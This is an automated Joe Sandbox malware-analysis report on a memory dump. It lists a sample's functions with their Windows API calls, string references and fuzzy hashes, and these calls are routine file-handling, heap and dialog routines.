Source File: 00000000.00000002.1305175428.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true

Associated: 00000000.00000002.1305158217.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305202405.0000000000CE3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305225878.0000000000CEE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305225878.0000000000CF5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305225878.0000000000D12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305290151.0000000000D13000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_cb0000_kBY9lgRaca.jbxd

Similarity

API ID: String
String ID: LCMapStringEx
API String ID: 2568140703-3893581201
Opcode ID: 96b525e26d314229b0de2661a7709f4f239ce8df117dedb4415a7dd67c789535
Instruction ID: e2c41b4699cf8df8dece3dfd66a092759e3e0fba2d7a40e0786a293225a64551
Opcode Fuzzy Hash: 96b525e26d314229b0de2661a7709f4f239ce8df117dedb4415a7dd67c789535
Instruction Fuzzy Hash: F5010832504259BBCF129F91DC06EEE7F62EF08750F054255FE1466261CB369A31EB91

Function 00CDAF0A Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 34COMMON

Download Yara Rule

APIs

InitializeCriticalSectionAndSpinCount.KERNEL32(?,?,00CDA56F), ref: 00CDAF55

Strings

InitializeCriticalSectionEx, xrefs: 00CDAF1B, 00CDAF25

Memory Dump Source

Source File: 00000000.00000002.1305175428.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true

Associated: 00000000.00000002.1305158217.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305202405.0000000000CE3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305225878.0000000000CEE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305225878.0000000000CF5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305225878.0000000000D12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305290151.0000000000D13000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_cb0000_kBY9lgRaca.jbxd

Similarity

API ID: CountCriticalInitializeSectionSpin
String ID: InitializeCriticalSectionEx
API String ID: 2593887523-3084827643
Opcode ID: e17f4fed02de1bda11885592f9d0e4663a8d04732411408d81059efec103547f
Instruction ID: b542206dd89fcf21065144db5c986f66725139ae717f35a832438cabef50896a
Opcode Fuzzy Hash: e17f4fed02de1bda11885592f9d0e4663a8d04732411408d81059efec103547f
Instruction Fuzzy Hash: 3EF0E931645258BFCF116F51DC06EAD7F61EF04711B004169FD199B361DB715E10A7C5

Function 00CDADAF Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 30memoryCOMMON

Download Yara Rule

APIs

TlsAlloc.KERNEL32 ref: 00CDADEE

Strings

FlsAlloc, xrefs: 00CDADC0, 00CDADCA

Memory Dump Source

Source File: 00000000.00000002.1305175428.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true

Associated: 00000000.00000002.1305158217.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305202405.0000000000CE3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305225878.0000000000CEE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305225878.0000000000CF5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305225878.0000000000D12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305290151.0000000000D13000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_cb0000_kBY9lgRaca.jbxd

Similarity

API ID: Alloc
String ID: FlsAlloc
API String ID: 2773662609-671089009
Opcode ID: 5ac4cf1bafc25093e494042be5e51ce548a2bed361adf958459a5b9068265269
Instruction ID: b44375ebebb6361ad2ad134a1d383beca400cc977bf91487764a0711e98639ec
Opcode Fuzzy Hash: 5ac4cf1bafc25093e494042be5e51ce548a2bed361adf958459a5b9068265269
Instruction Fuzzy Hash: 3AE055306402987BC300AB26DC06F2EBB91CF04721B0002AAFD059B341DE306F0082CA

Function 00CDBBF0 Relevance: 3.2, APIs: 2, Instructions: 168COMMON

Download Yara Rule

APIs

Part of subcall function 00CDB7BB: GetOEMCP.KERNEL32(00000000,?,?,00CDBA44,?), ref: 00CDB7E6

IsValidCodePage.KERNEL32(-00000030,00000000,?,?,?,?,00CDBA89,?,00000000), ref: 00CDBC64
GetCPInfo.KERNEL32(00000000,00CDBA89,?,?,?,00CDBA89,?,00000000), ref: 00CDBC77

Memory Dump Source

Source File: 00000000.00000002.1305175428.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true

Associated: 00000000.00000002.1305158217.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305202405.0000000000CE3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305225878.0000000000CEE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305225878.0000000000CF5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305225878.0000000000D12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305290151.0000000000D13000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_cb0000_kBY9lgRaca.jbxd

Similarity

API ID: CodeInfoPageValid
String ID:
API String ID: 546120528-0
Opcode ID: aa0512c8908e107a4aee3af7db33b923774d3efe85f6a652e4a98e0fc07609c1
Instruction ID: 4ba694cc31bb9da5f2f2b4f31b1d64f4055624a7fccd8efa047990c6861c0d02
Opcode Fuzzy Hash: aa0512c8908e107a4aee3af7db33b923774d3efe85f6a652e4a98e0fc07609c1
Instruction Fuzzy Hash: 27510370900345DEDB209F76C8816BBBBE6EF41300F1A446FD6A68B352DB359E469B90

Function 00CB9A74 Relevance: 3.1, APIs: 2, Instructions: 116COMMON

Download Yara Rule

APIs

SetFilePointer.KERNELBASE(000000FF,?,?,?,-00000870,00000000,00000800,?,00CB9A50,?,?,00000000,?,?,00CB8CBC,?), ref: 00CB9BAB
GetLastError.KERNEL32(?,00000000,00CB8411,-00009570,00000000,000007F3), ref: 00CB9BB6

Memory Dump Source

Source File: 00000000.00000002.1305175428.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true

Associated: 00000000.00000002.1305158217.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305202405.0000000000CE3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305225878.0000000000CEE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305225878.0000000000CF5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305225878.0000000000D12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305290151.0000000000D13000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_cb0000_kBY9lgRaca.jbxd

Similarity

API ID: ErrorFileLastPointer
String ID:
API String ID: 2976181284-0
Opcode ID: e4a65426b15e5b587810b9dd0fc95c43162f492195600d1d90c3249d7866b0e8
Instruction ID: 6cf42564e670b19788713e51ec2c61457bd6d7dd8cc7f0823b21ca753da88ff4
Opcode Fuzzy Hash: e4a65426b15e5b587810b9dd0fc95c43162f492195600d1d90c3249d7866b0e8
Instruction Fuzzy Hash: 4E41D0316043418FDB34DF15E5849EAB7E9FFD5320F148A2DEAA183260D770EE458B61

Function 00CDBA27 Relevance: 3.1, APIs: 2, Instructions: 91COMMON

Download Yara Rule

APIs

Part of subcall function 00CD97E5: GetLastError.KERNEL32(?,00CF1098,00CD4674,00CF1098,?,?,00CD40EF,?,?,00CF1098), ref: 00CD97E9
Part of subcall function 00CD97E5: _free.LIBCMT ref: 00CD981C
Part of subcall function 00CD97E5: SetLastError.KERNEL32(00000000,?,00CF1098), ref: 00CD985D
Part of subcall function 00CD97E5: _abort.LIBCMT ref: 00CD9863

Part of subcall function 00CDBB4E: _abort.LIBCMT ref: 00CDBB80
Part of subcall function 00CDBB4E: _free.LIBCMT ref: 00CDBBB4

Part of subcall function 00CDB7BB: GetOEMCP.KERNEL32(00000000,?,?,00CDBA44,?), ref: 00CDB7E6

_free.LIBCMT ref: 00CDBA9F
_free.LIBCMT ref: 00CDBAD5

Memory Dump Source

Source File: 00000000.00000002.1305175428.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true

Associated: 00000000.00000002.1305158217.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305202405.0000000000CE3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305225878.0000000000CEE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305225878.0000000000CF5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305225878.0000000000D12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305290151.0000000000D13000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_cb0000_kBY9lgRaca.jbxd

Similarity

API ID: _free$ErrorLast_abort
String ID:
API String ID: 2991157371-0
Opcode ID: 9fad596ccebdfc36cb679c6e943b1f6a444c97672de2cea3814270eb1fa6e626
Instruction ID: 5b58ecbb5b361c35213376ffe98f0d00defa9445c291758867c1211542d4414c
Opcode Fuzzy Hash: 9fad596ccebdfc36cb679c6e943b1f6a444c97672de2cea3814270eb1fa6e626
Instruction Fuzzy Hash: 1A31B831904209EFDB10DFA9D441BADB7F5EF44320F66409BE6185B3A2EB329E45EB50

Function 00CB1E50 Relevance: 3.1, APIs: 2, Instructions: 86COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00CB1E55

Part of subcall function 00CB3BBA: __EH_prolog.LIBCMT ref: 00CB3BBF

_wcslen.LIBCMT ref: 00CB1EFD

Memory Dump Source

Source File: 00000000.00000002.1305175428.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true

Associated: 00000000.00000002.1305158217.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305202405.0000000000CE3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305225878.0000000000CEE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305225878.0000000000CF5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305225878.0000000000D12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305290151.0000000000D13000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_cb0000_kBY9lgRaca.jbxd

Similarity

API ID: H_prolog$_wcslen
String ID:
API String ID: 2838827086-0
Opcode ID: bf0b4b9e7765c6a31178876faabd3db15b69cd84027ed6af8f0f39e2ea8fb3b1
Instruction ID: e4d7ede413c571fb3e26a3ccc7762b3d202bde5a07230b2f3792ba5d2e4236dd
Opcode Fuzzy Hash: bf0b4b9e7765c6a31178876faabd3db15b69cd84027ed6af8f0f39e2ea8fb3b1
Instruction Fuzzy Hash: 8B314971904249AFCF11DF99C965AEEBBF6BF18300F54006EF845A7251CB329E11DB60

Function 00CB9DA2 Relevance: 3.1, APIs: 2, Instructions: 83timeCOMMON

Download Yara Rule

APIs

FlushFileBuffers.KERNEL32(?,?,?,?,?,?,00CB73BC,?,?,?,00000000), ref: 00CB9DBC
SetFileTime.KERNELBASE(?,?,?,?), ref: 00CB9E70

Memory Dump Source

Source File: 00000000.00000002.1305175428.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true

Associated: 00000000.00000002.1305158217.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305202405.0000000000CE3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305225878.0000000000CEE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305225878.0000000000CF5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305225878.0000000000D12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305290151.0000000000D13000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_cb0000_kBY9lgRaca.jbxd

Similarity

API ID: File$BuffersFlushTime
String ID:
API String ID: 1392018926-0
Opcode ID: 90f17c79820763cdbdf090749b267345aa42f648d67842e8e98f4ab343aec80c
Instruction ID: 055023c1826c6248081ccb7b7c70fcfbfc825a69e4ab423d4a916fad263d9bb4
Opcode Fuzzy Hash: 90f17c79820763cdbdf090749b267345aa42f648d67842e8e98f4ab343aec80c
Instruction Fuzzy Hash: C421D031248385ABC714CF36C891BABBBE8EF55304F08491DF9E587151D339EA0C9B62

Function 00CB966E Relevance: 3.1, APIs: 2, Instructions: 82fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNELBASE(?,?,00000001,00000000,00000002,00000000,00000000,?,00000000,?,?,?,00CB9F27,?,?,00CB771A), ref: 00CB96E6
CreateFileW.KERNEL32(?,?,00000001,00000000,00000002,00000000,00000000,?,?,00000800,?,?,00CB9F27,?,?,00CB771A), ref: 00CB9716

Memory Dump Source

Source File: 00000000.00000002.1305175428.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true

Associated: 00000000.00000002.1305158217.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305202405.0000000000CE3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305225878.0000000000CEE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305225878.0000000000CF5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305225878.0000000000D12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305290151.0000000000D13000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_cb0000_kBY9lgRaca.jbxd

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 3c49511e4f5d82ae71b1ba06a4cd76b4776427054c7b0bac38c20b2a167de2f5
Instruction ID: 94470a5124dec2b091dde2223c865c9ec364458fc1e55c0614ddbf9d6c322462
Opcode Fuzzy Hash: 3c49511e4f5d82ae71b1ba06a4cd76b4776427054c7b0bac38c20b2a167de2f5
Instruction Fuzzy Hash: B321D0B1100344AFE3708A65CC89FF7B7DCEB49324F100A19FAE6C61D2C7B4A9849671

Function 00CB9E80 Relevance: 3.1, APIs: 2, Instructions: 56COMMON

Download Yara Rule

APIs

SetFilePointer.KERNELBASE(000000FF,00000000,00000000,00000001), ref: 00CB9EC7
GetLastError.KERNEL32 ref: 00CB9ED4

Memory Dump Source

Source File: 00000000.00000002.1305175428.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true

Associated: 00000000.00000002.1305158217.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305202405.0000000000CE3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305225878.0000000000CEE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305225878.0000000000CF5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305225878.0000000000D12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305290151.0000000000D13000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_cb0000_kBY9lgRaca.jbxd

Similarity

API ID: ErrorFileLastPointer
String ID:
API String ID: 2976181284-0
Opcode ID: cf575955e359dfe39724d2e181431e27cf9805ff1092c09d5e5d6377810eb7a8
Instruction ID: c5d91fb5dc8e6393a3dd720a8f2f4b13f0195282b51570c194280fd3329a3477
Opcode Fuzzy Hash: cf575955e359dfe39724d2e181431e27cf9805ff1092c09d5e5d6377810eb7a8
Instruction Fuzzy Hash: C111E530600784ABE734C679C884BF6B7E9EB45370F504A29E663D26D0D774EE45C760

Function 00CD8E54 Relevance: 3.0, APIs: 2, Instructions: 44memoryCOMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 00CD8E75

Part of subcall function 00CD8E06: RtlAllocateHeap.NTDLL(00000000,?,?,?,00CD4286,?,0000015D,?,?,?,?,00CD5762,000000FF,00000000,?,?), ref: 00CD8E38

HeapReAlloc.KERNEL32(00000000,?,?,?,00000007,00CF1098,00CB17CE,?,?,00000007,?,?,?,00CB13D6,?,00000000), ref: 00CD8EB1

Memory Dump Source

Source File: 00000000.00000002.1305175428.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true

Associated: 00000000.00000002.1305158217.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305202405.0000000000CE3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305225878.0000000000CEE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305225878.0000000000CF5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305225878.0000000000D12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305290151.0000000000D13000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_cb0000_kBY9lgRaca.jbxd

Similarity

API ID: Heap$AllocAllocate_free
String ID:
API String ID: 2447670028-0
Opcode ID: b27e661804aa26b483129474db9e3c28eff29e10ef3c70b4c33c62dbde35bab1
Instruction ID: 332dd6352f5b333d685309a4af087f2a85dc5708e4a886cbf86d3fed9fa76d0b
Opcode Fuzzy Hash: b27e661804aa26b483129474db9e3c28eff29e10ef3c70b4c33c62dbde35bab1
Instruction Fuzzy Hash: AFF0C83A60111176CB217B269C05B6F77688FC1B70B544117FB2496791DF709E08A9A0

Function 00CC109E Relevance: 3.0, APIs: 2, Instructions: 33COMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(?,?), ref: 00CC10AB
GetProcessAffinityMask.KERNEL32(00000000), ref: 00CC10B2

Memory Dump Source

Source File: 00000000.00000002.1305175428.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true

Associated: 00000000.00000002.1305158217.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305202405.0000000000CE3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305225878.0000000000CEE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305225878.0000000000CF5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305225878.0000000000D12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305290151.0000000000D13000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_cb0000_kBY9lgRaca.jbxd

Similarity

API ID: Process$AffinityCurrentMask
String ID:
API String ID: 1231390398-0
Opcode ID: e50945e69cbc6314696d641b90fa61ce686aecaed73813d65b7b15f33db3b0d3
Instruction ID: 79cd4e6ae92321b5f8d4ab46d742fb1fcc642bff93b706c9db63a4a7b31f3cb3
Opcode Fuzzy Hash: e50945e69cbc6314696d641b90fa61ce686aecaed73813d65b7b15f33db3b0d3
Instruction Fuzzy Hash: E5E09232F10185A78F098BA5DC19FAF73DDEA4524431841B9E813D7202F934EF414B60

Function 00CBA4ED Relevance: 3.0, APIs: 2, Instructions: 29COMMON

Download Yara Rule

APIs

SetFileAttributesW.KERNELBASE(?,00000000,00000001,?,00CBA325,?,?,?,00CBA175,?,00000001,00000000,?,?), ref: 00CBA501

Part of subcall function 00CBBB03: _wcslen.LIBCMT ref: 00CBBB27

SetFileAttributesW.KERNEL32(?,00000000,?,?,00000800,?,00CBA325,?,?,?,00CBA175,?,00000001,00000000,?,?), ref: 00CBA532

Memory Dump Source

Source File: 00000000.00000002.1305175428.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true

Associated: 00000000.00000002.1305158217.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305202405.0000000000CE3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305225878.0000000000CEE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305225878.0000000000CF5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305225878.0000000000D12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305290151.0000000000D13000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_cb0000_kBY9lgRaca.jbxd

Similarity

API ID: AttributesFile$_wcslen
String ID:
API String ID: 2673547680-0
Opcode ID: 05c49267526354a8a69be37eb91a1a1364ba55981f9138829e3345a49b5490d8
Instruction ID: 7169e90d06479385b79ec4c4fde9d2067e78e82353ede7a688ccdf0214a29c8f
Opcode Fuzzy Hash: 05c49267526354a8a69be37eb91a1a1364ba55981f9138829e3345a49b5490d8
Instruction Fuzzy Hash: E2F030322401497BDF115F60DC45FEE37ACAB04385F448051B945D6160DB71DB98EA60

Function 00CBA1E0 Relevance: 3.0, APIs: 2, Instructions: 27fileCOMMON

Download Yara Rule

APIs

DeleteFileW.KERNELBASE(000000FF,?,?,00CB977F,?,?,00CB95CF,?,?,?,?,?,00CE2641,000000FF), ref: 00CBA1F1

Part of subcall function 00CBBB03: _wcslen.LIBCMT ref: 00CBBB27

DeleteFileW.KERNEL32(?,000000FF,?,00000800,?,?,00CB977F,?,?,00CB95CF,?,?,?,?,?,00CE2641), ref: 00CBA21F

Memory Dump Source

Source File: 00000000.00000002.1305175428.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true

Associated: 00000000.00000002.1305158217.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305202405.0000000000CE3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305225878.0000000000CEE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305225878.0000000000CF5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305225878.0000000000D12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305290151.0000000000D13000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_cb0000_kBY9lgRaca.jbxd

Similarity

API ID: DeleteFile$_wcslen
String ID:
API String ID: 2643169976-0
Opcode ID: 004b668fb92c1c588c6d98c4ed1af2c90afb8e2185921a7d34903de11cfe877a
Instruction ID: e408d7fc17bbce9ca13219dcff27a7f2e6dea843c92f55150912eae9ed6550cc
Opcode Fuzzy Hash: 004b668fb92c1c588c6d98c4ed1af2c90afb8e2185921a7d34903de11cfe877a
Instruction Fuzzy Hash: B6E0D8311402496BEB019F60DC45FED375CAF0C3C1F484021B949D6051EB71DEC4EA55

Function 00CCAC7C Relevance: 3.0, APIs: 2, Instructions: 26COMMON

Download Yara Rule

APIs

GdiplusShutdown.GDIPLUS(?,?,?,?,00CE2641,000000FF), ref: 00CCACB0
CoUninitialize.COMBASE(?,?,?,?,00CE2641,000000FF), ref: 00CCACB5

Memory Dump Source

Source File: 00000000.00000002.1305175428.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true

Associated: 00000000.00000002.1305158217.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305202405.0000000000CE3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305225878.0000000000CEE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305225878.0000000000CF5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305225878.0000000000D12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305290151.0000000000D13000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_cb0000_kBY9lgRaca.jbxd

Similarity

API ID: GdiplusShutdownUninitialize
String ID:
API String ID: 3856339756-0
Opcode ID: 7cffaa31815baeebb79e962551241fab096cec1fc29be16425b8406e337a43d2
Instruction ID: 6d1494176ea6df35260bfcd81cbcc68bf5c7ebe52ad172f64e302ff085d546dd
Opcode Fuzzy Hash: 7cffaa31815baeebb79e962551241fab096cec1fc29be16425b8406e337a43d2
Instruction Fuzzy Hash: 48E06D72604A90EFCB009B59DC46B59FBACFB88B20F14436AF416D37A0CB74A841CA94

Function 00CBA243 Relevance: 3.0, APIs: 2, Instructions: 25COMMON

Download Yara Rule

APIs

GetFileAttributesW.KERNELBASE(?,?,?,00CBA23A,?,00CB755C,?,?,?,?), ref: 00CBA254

Part of subcall function 00CBBB03: _wcslen.LIBCMT ref: 00CBBB27

GetFileAttributesW.KERNELBASE(?,?,?,00000800,?,00CBA23A,?,00CB755C,?,?,?,?), ref: 00CBA280

Memory Dump Source

Source File: 00000000.00000002.1305175428.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true

Associated: 00000000.00000002.1305158217.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305202405.0000000000CE3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305225878.0000000000CEE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305225878.0000000000CF5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305225878.0000000000D12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305290151.0000000000D13000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_cb0000_kBY9lgRaca.jbxd

Similarity

API ID: AttributesFile$_wcslen
String ID:
API String ID: 2673547680-0
Opcode ID: 40033b2df0ee988a43e1917140cc693c4334e814d061f7714afe1b940f77de1a
Instruction ID: c68468cfc0571c43c4b36b97de2d2f453a4709126dab8d60f86dd8734216dd6c
Opcode Fuzzy Hash: 40033b2df0ee988a43e1917140cc693c4334e814d061f7714afe1b940f77de1a
Instruction Fuzzy Hash: 3BE0D8325001646BCB60AB64CC09BDD7B5CAF083E2F044261FD99E71D0D770DE44DAE1

Function 00CCDEC2 Relevance: 3.0, APIs: 2, Instructions: 25COMMON

Download Yara Rule

APIs

_swprintf.LIBCMT ref: 00CCDEEC

Part of subcall function 00CB4092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00CB40A5

SetDlgItemTextW.USER32(00000065,?), ref: 00CCDF03

Part of subcall function 00CCB568: PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 00CCB579
Part of subcall function 00CCB568: GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00CCB58A
Part of subcall function 00CCB568: IsDialogMessageW.USER32(00010410,?), ref: 00CCB59E
Part of subcall function 00CCB568: TranslateMessage.USER32(?), ref: 00CCB5AC
Part of subcall function 00CCB568: DispatchMessageW.USER32(?), ref: 00CCB5B6

Memory Dump Source

Source File: 00000000.00000002.1305175428.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true

Associated: 00000000.00000002.1305158217.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305202405.0000000000CE3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305225878.0000000000CEE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305225878.0000000000CF5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305225878.0000000000D12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305290151.0000000000D13000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_cb0000_kBY9lgRaca.jbxd

Similarity

API ID: Message$DialogDispatchItemPeekTextTranslate__vswprintf_c_l_swprintf
String ID:
API String ID: 2718869927-0
Opcode ID: 50517f7ec3ca78b6088ba79f3a2f75c082f6f050a6ee191e2c07d2f33bfe5c5b
